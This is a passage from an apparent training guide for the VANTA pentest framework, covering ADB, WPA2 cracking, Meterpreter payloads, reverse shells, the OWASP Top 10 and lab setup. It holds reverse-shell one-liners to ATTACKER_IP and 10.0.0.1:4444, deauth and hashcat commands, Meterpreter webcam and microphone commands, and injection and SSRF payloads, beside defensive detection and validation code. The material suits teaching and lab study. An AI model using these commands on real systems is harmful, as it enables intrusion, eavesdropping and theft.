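    perms = {e.get(ANDROID_NAME) for e in root.iter("uses-permission")}
    components, boot = set(), set()
    for kind in ("activity", "service", "receiver", "provider"):
        for comp in root.iter(kind):
            name = comp.get(ANDROID_NAME)
            components.add((kind, name))
            actions = {a.get(ANDROID_NAME) for a in comp.iter("action")}
            if kind == "receiver" and BOOT_ACTION in actions:
                boot.add(name)
    return {"permissions": perms, "components": components, "boot_receivers": boot}


def diff_manifests(baseline_xml: str, candidate_xml: str) -> dict:
    """Report what the candidate declares that the baseline does not."""
    base, cand = summarize(baseline_xml), summarize(candidate_xml)
    added_perms = cand["permissions"] - base["permissions"]
    added_comps = cand["components"] - base["components"]
    report = {
        "added_permissions": sorted(added_perms),
        "added_components": sorted(added_comps),
        "added_boot_receivers": sorted(cand["boot_receivers"] - base["boot_receivers"]),
    }
    # Assumed rule: watched permission + new service + new boot receiver together.
    report["repackaging_suspected"] = bool(
        added_perms & WATCHED
        and any(kind == "service" for kind, _ in added_comps)
        and report["added_boot_receivers"]
    )
    return report


if __name__ == "__main__":
    for key, value in diff_manifests(BASELINE, CANDIDATE).items():
        print(f"{key}: {value}")
```

A signing-certificate mismatch against the known-good build is the stronger signal; the manifest diff explains what changed once that mismatch is seen.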

ADB — What It Actually Does

ADB Daemon
adbd runs on the Android device as a system service. It listens for USB connections (and TCP on port 5555 if WiFi ADB is enabled). ADB commands are forwarded through this daemon.
ADB over TCP
adb connect 192.168.1.50:5555 connects over WiFi instead of USB. Devices with exposed port 5555 are trivially exploitable — no auth required on many firmware versions.
adb shell
Opens a shell on the device running as the shell user (UID 2000). On rooted devices, adb shell su gives root. Most pentest operations use adb shell.
adb install
Installs an APK on the connected device. -r replaces an existing app. The device must have "Install from unknown sources" or ADB debugging enabled.

17 WiFi Security

How WiFi Can Be Compromised

WiFi uses radio waves. Unlike a cable (private), radio waves travel through walls and into the street. Security relies entirely on encryption. When encryption is weak or handshakes are captured, the password can be recovered offline. The wifi_monitor module automates this capture.

WPA2 — The 4-Way Handshake

When a device connects to a WPA2 network:

Client                          Access Point (AP)
  │                                    │
  │──── Association Request ──────────▶│
  │◀─── ANonce (AP nonce) ─────────────│  (random number)
  │                                    │
  │  Client generates SNonce, derives PTK using:
  │  PTK = f(PMK, ANonce, SNonce, client_MAC, AP_MAC)
  │  PMK = PBKDF2(HMAC-SHA1, password, SSID, 4096, 32)
  │                                    │
  │──── SNonce + MIC ─────────────────▶│  (MIC proves client knows PMK)
  │◀─── GTK (group key) + MIC ─────────│
  │──── ACK ──────────────────────────▶│

The attacker captures SNonce + ANonce + MIC from the air.
Then runs offline dictionary attack: try each password, compute PTK, verify MIC.
If MIC matches → password found.

Monitor Mode vs Managed Mode

Managed Mode (Normal)
Default WiFi mode. Your NIC only processes packets addressed to your MAC or broadcast. It ignores all other traffic on the channel. You cannot capture traffic for other devices.
Monitor Mode
NIC captures all 802.11 frames regardless of destination. Required for passive WiFi attacks. Not all NICs support this — check with iw list | grep monitor. wifi_monitor enables this automatically.
# What wifi_monitor does under the hood:
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up

# Channel lock (stay on target AP's channel)
iw dev wlan0 set channel 6

# Capture with airodump-ng
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0

# Deauth attack to force clients to re-associate (capture handshake)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0

# Crack offline
hashcat -m 22000 capture.hccapx wordlist.txt

18 Payloads & Staging

What a Payload Actually Is

In pentesting, a payload is the code that runs on the target after exploitation. The payload is what gives you control. Understanding payload types is essential for choosing the right technique for each android_pentest and revshell operation.

Staged vs Stageless

Stageless (inline)
The entire payload is embedded in the APK / binary. Self-contained. Uses more space. Works even if the attacker's server is unreachable during initial execution.

Metasploit name: android/meterpreter_reverse_tcp (no slash between meterpreter_reverse)
Staged (stager + stage)
A tiny stager is embedded — its only job is to connect back and download the real stage (Meterpreter) from the handler. Smaller initial binary. Requires the handler to be running when the payload executes.

Metasploit name: android/meterpreter/reverse_tcp (slash between meterpreter/reverse)

Meterpreter — What It Is

Meterpreter is Metasploit's advanced in-memory payload. Key properties:

  - Runs entirely in memory — no files written to disk (evasion)
  - Encrypted communications — looks like normal HTTPS traffic
  - Extensible — load modules: screenshot, webcam_snap, sysinfo, hashdump
  - Pivoting — use compromised host to reach internal network
  - Persistence — embed in startup scripts, registry, cron jobs

Core commands:
  sysinfo            → OS, hostname, architecture
  getuid             → current user and UID
  screenshot         → capture screen
  webcam_snap        → photo from front/rear camera
  record_mic 10      → 10 seconds of audio
  shell              → drop into device OS shell
  upload /file /path → push file to device
  download /path     → pull file from device

Transport Protocols — Why It Matters

reverse_tcp
Target connects outbound to attacker. Most firewalls allow outbound TCP. Best when target is behind NAT. Requires attacker to have a public IP or tunnel (bore, cloudflare).
reverse_https
Same as reverse_tcp but over TLS on port 443. Blends with web traffic. Best for evading corporate firewalls and deep packet inspection. VANTA default for WAN ops.
bind_tcp
Payload opens a listener on the target — attacker connects in. Blocked by most firewalls (inbound rules). Use only on LAN targets or when attacker can reach target directly.
bore / Cloudflare Tunnel
Exposes a local port to the internet via a tunnel service. VANTA uses bore to forward LPORT 4444 to a bore.pub subdomain, giving the target a reachable internet address to connect to.

19 Reverse Shells

What a Reverse Shell Actually Does

A reverse shell is one of the most fundamental concepts in offensive security. Every meterpreter session, every C2 callback, every netcat listener is a reverse shell in some form. Understanding it from first principles makes the revshell module and every advanced technique click.

Bind Shell vs Reverse Shell

Bind Shell (attacker connects TO target):

  Target:   nc -lvnp 4444 -e /bin/bash     # opens port 4444, gives shell to anyone who connects
  Attacker: nc 192.168.1.50 4444            # connect to target's open port

  Problem: target's firewall blocks inbound port 4444.

──────────────────────────────────────────────────────────────────

Reverse Shell (target connects TO attacker):

  Attacker: nc -lvnp 4444                   # open listener on our machine
  Target:   bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1  # target calls back

  Works because: firewalls usually allow outbound connections.
  The target initiates — it goes OUT through the firewall, not in.

One-Liners — How They Work

Bash /dev/tcp
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
Bash's built-in /dev/tcp device opens a TCP connection. Redirects stdin/stdout/stderr to the socket. Gives the attacker an interactive bash session over TCP.
Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash"])'
Netcat (with -e)
nc -e /bin/bash 10.0.0.1 4444 — available in ncat/some nc versions. Executes /bin/bash and connects its stdin/stdout to the network socket.
Upgrading a Shell
Raw netcat shells have no TTY — Ctrl+C kills the session, no tab completion. Upgrade: python3 -c 'import pty;pty.spawn("/bin/bash")' then stty raw -echo; fg on attacker side.
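
Seen from the defending side, every one-liner above leaves the same trace: the shell's stdin, stdout and stderr are all the same TCP socket. The following Python check is an added example (not part of VANTA or the original page) that reads this from /proc on Linux; the function names are chosen here, and the sample fd links and /proc/net/tcp row are constructed, reusing the 192.168.1.50 and 10.0.0.1:4444 addresses from above.

```python
import os
import re
import socket
import struct

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")

def stdio_socket_inode(fd_links):
    """Inode of the single socket behind fds 0, 1 and 2, or None."""
    targets = {fd_links.get(fd) for fd in (0, 1, 2)}
    match = SOCKET_LINK.match(targets.pop() or "") if len(targets) == 1 else None
    return match.group(1) if match else None

def tcp_peers(proc_net_tcp):
    """Map socket inode -> remote 'ip:port' from /proc/net/tcp (little-endian host assumed)."""
    peers = {}
    for fields in map(str.split, proc_net_tcp.splitlines()[1:]):  # skip header
        if len(fields) >= 10:
            hex_ip, hex_port = fields[2].split(":")
            ip = socket.inet_ntoa(struct.pack("<I", int(hex_ip, 16)))
            peers[fields[9]] = f"{ip}:{int(hex_port, 16)}"
    return peers

def shell_on_tcp_socket(fd_links, proc_net_tcp):
    """Remote peer if stdin, stdout and stderr are one TCP socket, else None."""
    inode = stdio_socket_inode(fd_links)
    return tcp_peers(proc_net_tcp).get(inode) if inode else None

def scan_live():
    """Linux only: {pid: peer} for each process this user can inspect."""
    with open("/proc/net/tcp") as handle:
        table = handle.read()
    hits = {}
    for pid in filter(str.isdigit, os.listdir("/proc")):
        links = {}
        for fd in (0, 1, 2):
            try:
                links[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
            except OSError:
                pass  # process exited or access denied
        peer = shell_on_tcp_socket(links, table)
        if peer:
            hits[int(pid)] = peer
    return hits

# Constructed sample: stdio dup2()'d onto one socket, 192.168.1.50 -> 10.0.0.1:4444.
SAMPLE_FDS = {0: "socket:[48213]", 1: "socket:[48213]", 2: "socket:[48213]"}
SAMPLE_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 3201A8C0:D2F4 0100000A:115C 01 00000000:00000000 00:00000000 00000000  1000        0 48213 1"""
```

Processes started by inetd-style supervisors also have socket stdio, so treat a hit as a lead to triage. IPv6 peers are listed in /proc/net/tcp6, which this block does not read.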

What revshell Does

revshell generates and delivers working reverse shell payloads for:

  go     → compiled Go binary (static, no deps, works anywhere)
  py     → Python3 one-liner (runs on any system with Python)
  bash   → bash /dev/tcp one-liner
  pwsh   → PowerShell (Windows targets)
  php    → web shell via PHP RCE
  node   → Node.js reverse shell

VANTA auto-starts a netcat/msfconsole listener on LPORT and optionally
runs bore to expose LHOST to the internet for WAN targets.

20 OWASP Top 10

The 10 Most Critical Web Vulnerabilities

The OWASP Top 10 is the industry-standard list of the most critical web application security risks. The websec module covers all 10. Know these before you touch websec.

A01 — Broken Access Control
#1 most common. Users can access resources/functions they shouldn't. IDOR: /api/user/1234 → change to /api/user/1235 and you read another user's data.
A02 — Cryptographic Failures
Weak or absent encryption. Passwords stored as MD5. Data transmitted over HTTP. TLS 1.0 still accepted. AES-ECB used (deterministic — patterns visible in ciphertext).
A03 — Injection
SQL injection, command injection, LDAP injection. Untrusted input reaches an interpreter. ' OR '1'='1 in a login form may bypass authentication entirely.
A04 — Insecure Design
Architectural flaws — missing rate limiting on login (brute force), no account lockout, business logic that can be abused (buy items at negative price).
A05 — Security Misconfiguration
Default credentials. Debug mode on in prod. S3 bucket public. Verbose error messages leaking stack traces and code paths.
A06 — Vulnerable Components
Using outdated libraries with known CVEs. Log4Shell was this category. Check: npm audit, pip-audit, snyk test.
A07 — Authentication Failures
Weak passwords allowed. No MFA. Session tokens predictable. Password reset via guessable security questions. Sessions not invalidated on logout.
A08 — Software Integrity Failures
Unsigned updates. CI/CD pipelines that pull from unverified sources. Deserialization of untrusted data (Java/PHP object injection).
A09 — Logging Failures
No logging of failed logins, no alerts on anomalous access. Attackers operate for months undetected. Also: logs that include sensitive data (passwords in URLs).
A10 — SSRF
Server-Side Request Forgery. The app makes an HTTP request to an attacker-supplied URL: url=http://169.254.169.254/latest/meta-data/ → reads AWS metadata (credentials).
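
For A10, the server-side fix is to vet the destination before fetching it. This added Python example (not VANTA code; the function names, hostnames and sample DNS table are assumptions made here) checks the addresses a URL's host maps to and refuses loopback, private and link-local targets such as the 169.254.169.254 metadata address.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def is_internal(address):
    """True for loopback, private, link-local and other non-public addresses."""
    ip = ipaddress.ip_address(address)
    if ip.version == 6 and ip.ipv4_mapped is not None:   # ::ffff:169.254.169.254
        ip = ip.ipv4_mapped
    return (ip.is_loopback or ip.is_link_local or ip.is_private
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)

def system_resolver(host):
    """Every address the name maps to, using the system resolver."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_outbound_url(url, resolve=system_resolver):
    """Return (allowed, reason) for a user-supplied URL the server would fetch."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    try:
        addresses = {str(ipaddress.ip_address(host))}   # IP literal: no lookup
    except ValueError:
        try:
            addresses = set(resolve(host))
        except OSError:
            return False, "host does not resolve"
    blocked = sorted(a for a in addresses if is_internal(a))
    if blocked or not addresses:
        return False, f"{host} is not a public destination: {blocked}"
    # The caller must connect to one of these vetted addresses (and re-run this
    # check on every redirect); resolving again at fetch time reopens the hole.
    return True, "ok"

# Constructed DNS data so the example runs offline; hostnames are made up.
SAMPLE_DNS = {"cdn.example.com": {"8.8.8.8"},
              "avatars.example.net": {"8.8.8.8", "169.254.169.254"}}

def sample_resolver(host):
    if host not in SAMPLE_DNS:
        raise OSError(f"no such host: {host}")
    return SAMPLE_DNS[host]
```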

21 Practice Lab

Building Your Home Lab

You need a lab to safely practice. Practicing on real systems you don't own is illegal. A home lab gives you intentionally vulnerable targets — legally — for every skill level. This is the minimum setup to work through all VANTA modules.

Layer 0 — Your Attack Machine

Option A: Kali Linux (Recommended)
Debian-based distro with every offensive tool pre-installed. apt install kali-linux-everything after a minimal install. Run as a VM (VirtualBox, VMware, Parallels) or on dedicated hardware. VANTA was developed on Kali — highest compatibility.
Option B: ParrotOS / Ubuntu
Any Debian/Ubuntu system works. Install tools manually as needed. ParrotOS is lighter than Kali with a similar toolset. Ubuntu works fine — you'll just run more apt install commands.

Layer 1 — Vulnerable Target VMs

Download intentionally vulnerable machines from:

  Vulnhub.com          → free OVA/VMDK images, thousands of machines
  TryHackMe.com        → browser-based, guided rooms, beginner-friendly
  HackTheBox.com       → more challenging, CTF-style
  OffSec Proving Grounds → OSCP-style machines

Recommended first targets:
  Metasploitable 2     → Vulnhub — every classic vuln, great for MSF practice
  DVWA                 → Damn Vulnerable Web App — runs in Docker, all OWASP top 10
  VulnDocker           → Docker compose with intentionally misconfigured containers
  Android Emulator     → AVD with debugging enabled for android_pentest practice

Layer 2 — Network Isolation

Critical: Always run vulnerable VMs on an isolated host-only network — never on your main network or bridged to the internet. A compromised Metasploitable 2 that's internet-accessible could be used as a stepping stone by external attackers.
VirtualBox: Set VM network to "Host-Only Adapter" → vboxnet0
VMware:     Set VM network to "Host-Only" → vmnet1

Your attack machine can reach the vulnerable VM.
The vulnerable VM cannot reach the internet.
Your actual network is completely isolated.

Check with: ip addr show   (on vulnerable VM — should show 192.168.56.x range)
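
The isolation claims above can be checked on the vulnerable VM from its routing table rather than by eye. This added Python example (not from the original page) parses /proc/net/route and reports a default route or any route outside 192.168.56.0/24; both sample tables are constructed, and the lab range is an assumption taken from the 192.168.56.x range mentioned above.

```python
import ipaddress
import socket
import struct

LAB_NET = ipaddress.ip_network("192.168.56.0/24")   # host-only range named above

def _addr(hex_word):
    """Decode one /proc/net/route address column (little-endian host assumed)."""
    return socket.inet_ntoa(struct.pack("<I", int(hex_word, 16)))

def audit_routes(proc_net_route, lab_net=LAB_NET):
    """List IPv4 routes that would let the VM talk to anything beyond lab_net."""
    findings = []
    for fields in map(str.split, proc_net_route.splitlines()[1:]):   # skip header
        if len(fields) < 8:
            continue
        iface, dest, gateway = fields[0], _addr(fields[1]), _addr(fields[2])
        prefix = bin(int(fields[7], 16)).count("1")     # netmask -> prefix length
        network = ipaddress.ip_network(f"{dest}/{prefix}", strict=False)
        if prefix == 0:
            findings.append(f"default route via {gateway} on {iface}")
        elif not network.subnet_of(lab_net):
            findings.append(f"route to {network} on {iface} is outside {lab_net}")
    return findings

# Constructed samples in /proc/net/route layout.
ISOLATED_ROUTES = """Iface Destination Gateway  Flags RefCnt Use Metric Mask     MTU Window IRTT
eth0  0038A8C0    00000000 0001  0      0   0      00FFFFFF 0   0      0"""

BRIDGED_ROUTES = """Iface Destination Gateway  Flags RefCnt Use Metric Mask     MTU Window IRTT
eth0  00000000    0101A8C0 0003  0      0   100    00000000 0   0      0
eth0  0001A8C0    00000000 0001  0      0   100    00FFFFFF 0   0      0"""

if __name__ == "__main__":
    with open("/proc/net/route") as handle:        # run this on the vulnerable VM
        for finding in audit_routes(handle.read()) or ["no route leaves the lab network"]:
            print(finding)
```

An empty result means the VM has no IPv4 path off the host-only network; IPv6 routes are not covered by this check.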

Docker Lab — Quick Start

# Ports are published on 127.0.0.1 only, so the vulnerable services
# are reachable from this machine but not from the rest of your network.

# Spin up DVWA (web app testing):
docker run -d -p 127.0.0.1:80:80 vulnerables/web-dvwa
# Open http://localhost → admin/password → set security to low → test all vulns

# Spin up a vulnerable SSH target:
docker run -d -p 127.0.0.1:2222:22 sickp/alpine-sshd
ssh -p 2222 root@localhost   # password: root

# Spin up intentionally vulnerable API:
docker run -d -p 127.0.0.1:5000:5000 clementinesurprenant/vuln-nodejs-app

22 CTF Basics

Capture The Flag — How It Works

CTF (Capture The Flag) competitions are how most security professionals learn and measure their skills. You solve security challenges to find hidden strings called flags. The ctfpwn module automates common CTF techniques.

CTF Categories

Web
Exploit web applications to find flags. SQL injection, XSS, SSRF, JWT manipulation, cookie forgery. Often the most beginner-accessible category.
Crypto
Break cryptographic schemes. RSA with small e, XOR with repeated key, CBC bit-flipping, Vigenère cipher analysis. Python is your main tool here.
Reverse Engineering
Analyze compiled binaries to understand what they do. Decompile with Ghidra, debug with GDB. Find hardcoded flags, license key algorithms, self-modifying code.
Pwn / Binary Exploitation
Buffer overflow, format string, heap exploitation. Write shellcode, ret2libc, ROP chains. Typically Linux x64 ELF binaries. The hardest category — but the most satisfying.
Forensics
Analyze disk images, memory dumps, packet captures, steganography. Flag hidden in image metadata, in deleted files, in network traffic. binwalk, Autopsy, Wireshark.
OSINT
Open Source Intelligence — find flags using public information. Find email via domain lookup, LinkedIn profiles via username, location from EXIF metadata in photos.

Flag Format and Submission

Most CTFs use a flag format like:
  CTF{this_is_a_sample_flag}
  FLAG{s0me_secret_string_h3re}
  VANTA{found_it}

You paste the flag into the CTF platform to get points.

First CTF checklist:
  1. TryHackMe account → complete "Introduction to Pentesting" learning path
  2. Solve "Mr Robot" (medium), "Basic Pentesting" (easy)
  3. For web: try "OWASP Top 10" room (free)
  4. For all-around: "Advent of Cyber" (free each December)
  5. Progress to HackTheBox starting boxes: "Lame", "Legacy", "Blue"

ctfpwn — What It Automates

VANTA ctfpwn module covers common CTF tasks:

  binary_enum     → checksec, strings, file type, disassemble entry point
  sqli_scan       → sqlmap-style injection test across parameters
  lfi_scan        → Local File Inclusion path traversal attempts
  hash_crack      → rockyou wordlist attack on MD5/SHA1/SHA256
  steg_extract    → steghide, zsteg, binwalk extraction from images
  jwt_tamper      → decode JWT, try alg:none, crack HS256 with wordlist
  b64_decode      → recursive base64/base32/rot13/hex decode chain

11 Study Resources

Where to Go Deeper

VANTA is a framework for applying knowledge, not a substitute for it. These resources build the conceptual foundation you need to understand why the tools work — making you effective even when the automation fails. Ordered by cost (free first).

Free Practice Platforms

PortSwigger Web Security Academy
portswigger.net/web-security — The best free web security course online. 100+ interactive labs covering SQLi, XSS, SSRF, XXE, CSRF, IDOR, deserialization, and more. Use websec against the lab URLs. No account required for most labs.
TryHackMe
tryhackme.com — Browser-based labs with guided rooms for every security topic. Free tier gives access to most content. Start with: "Pre-Security" → "Introduction to Cybersecurity" → "Jr Penetration Tester" path.
HackTheBox
hackthebox.com — Harder than TryHackMe, closer to real engagement experience. Free tier includes some machines. The Academy section has structured courses. Filter machines by OS and difficulty. Read write-ups after solving (or failing).
Metasploit Unleashed
offensive-security.com/metasploit-unleashed — Free Metasploit course by Offensive Security. Covers the framework VANTA's revshell and android_pentest modules use for payload generation and handlers.
OWASP
owasp.org — The Open Web Application Security Project. Free resources: OWASP Top 10, Testing Guide, Mobile Security Testing Guide (MASTG). The MASTG is the companion reading for android_pentest and ios_pentest.
GTFOBins / LOLBAS
gtfobins.github.io (Linux) and lolbas-project.github.io (Windows) — Living Off The Land references. Which binaries already on a system can spawn shells, read files, or escalate privileges. Essential post-exploitation reference.
PayloadsAllTheThings
github.com/swisskyrepo/PayloadsAllTheThings — Massive collection of payloads for SQLi, XSS, command injection, file inclusion, SSRF, etc. Reference when websec's built-in payloads don't work — try the next one in the list.
HackTricks
book.hacktricks.xyz — Cheatsheets for exploiting every protocol, service, and vulnerability type. Port-by-port exploitation guide, AD attack chains, Linux/Windows privilege escalation. The reference you have open while running VANTA.

Free Vulnerable Apps (Your Lab Targets)

App / Lab | Type | Setup | Best for practicing
DVWA (Damn Vulnerable Web App) | Web | docker run -p 80:80 vulnerables/web-dvwa | websec — SQLi, XSS, file upload, command injection at 4 difficulty levels
Metasploitable 2/3 | Linux VM | Download from vulnhub.com, import into VirtualBox/KVM | netrecon, revshell — vsftpd exploit, Samba, UnrealIRCd, dozens of vulns
GOAD (Game of Active Directory) | Windows AD | github.com/Orange-Cyberdefense/GOAD — Vagrant + VirtualBox | windowsAD, adsec — full vulnerable AD forest with multiple DCs
InsecureBankv2 | Android APK | github.com/dineshshetty/Android-InsecureBankv2 | android_pentest — exported activities, SQLite injection, weak crypto
DIVA Android | Android APK | github.com/payatu/diva-android | android_pentest — 13 vulnerability challenges with hints
OWASP WebGoat | Web | docker run -p 8080:8080 webgoat/webgoat | websec — explains each vuln then lets you exploit it
VulnHub | VM collection | vulnhub.com — download any VM, import into local hypervisor | All modules — community-built vulnerable VMs from beginner to expert

Books — Deep Knowledge

The Web Application Hacker's Handbook
Stuttard & Pinto (Wiley) — Intermediate. Comprehensive web vuln reference. Chapters 9 (SQLi) and 12 (XSS) are still the best explanations anywhere. Read before advanced websec operations.
Penetration Testing
Georgia Weidman (No Starch) — Beginner-Intermediate. Full pentest methodology using Metasploit, Wireshark, and manual exploitation. The closest thing to a textbook companion for VANTA's workflow.
Android Security Internals
Nikolay Elenkov (No Starch) — Intermediate. The definitive Android security reference: sandboxing, permissions, cryptography, keystore, Binder IPC. Read chapters 1–5 before advanced android_pentest operations.
The Hacker Playbook 3
Peter Kim (Secure Planet) — Intermediate-Advanced. Red team techniques: C2, evasion, AD lateral movement, custom tooling. Covers the strategy behind what VANTA's AD modules implement.
Real-World Bug Hunting
Peter Yaworski (No Starch) — Beginner. Real bug bounty writeups for each vulnerability class. Shows how websec findings translate into report-quality documentation.
Black Hat Python
Seitz & Arnold (No Starch) — Intermediate. Build your own network tools, shells, and scanners in Python. Directly applicable to extending any VANTA module (all modules are Python).

Certifications — Structured Learning

Certification | Level | Cost | Best for
eJPT (eLearnSecurity Junior Penetration Tester) | Beginner | ~$200 | First hands-on cert. Covers network scanning, web vulns, basics — all VANTA foundations.
PNPT (Practical Network Penetration Tester) | Intermediate | ~$400 | TCM Security. Full pentest lab exam — network recon → AD exploitation. Direct VANTA workflow.
OSCP (PEN-200) | Intermediate-Advanced | ~$1500 | Industry-recognized. Lab-based exam, 24h. The gold standard for pentesting certifications.
CRTP (Certified Red Team Professional) | Intermediate | ~$400 | PentesterAcademy. Focuses on Active Directory attacks — directly applies to windowsAD module.
eMAPT (eLearnSecurity Mobile Application Penetration Tester) | Intermediate | ~$400 | Android and iOS app pentesting methodology — direct companion to android_pentest module.
Recommendation: Don't chase certifications before building real skills. Complete TryHackMe's Jr Pentester path and root 10 HackTheBox machines first. The cert validates skills — it doesn't replace building them. Use VANTA on practice labs while you study, not instead of studying.

12 Your Roadmap

12-Week Learning Roadmap

Follow this plan to go from complete beginner to confidently using every VANTA module. Each week combines reading, lab practice, and VANTA usage — reinforcing knowledge through the tool.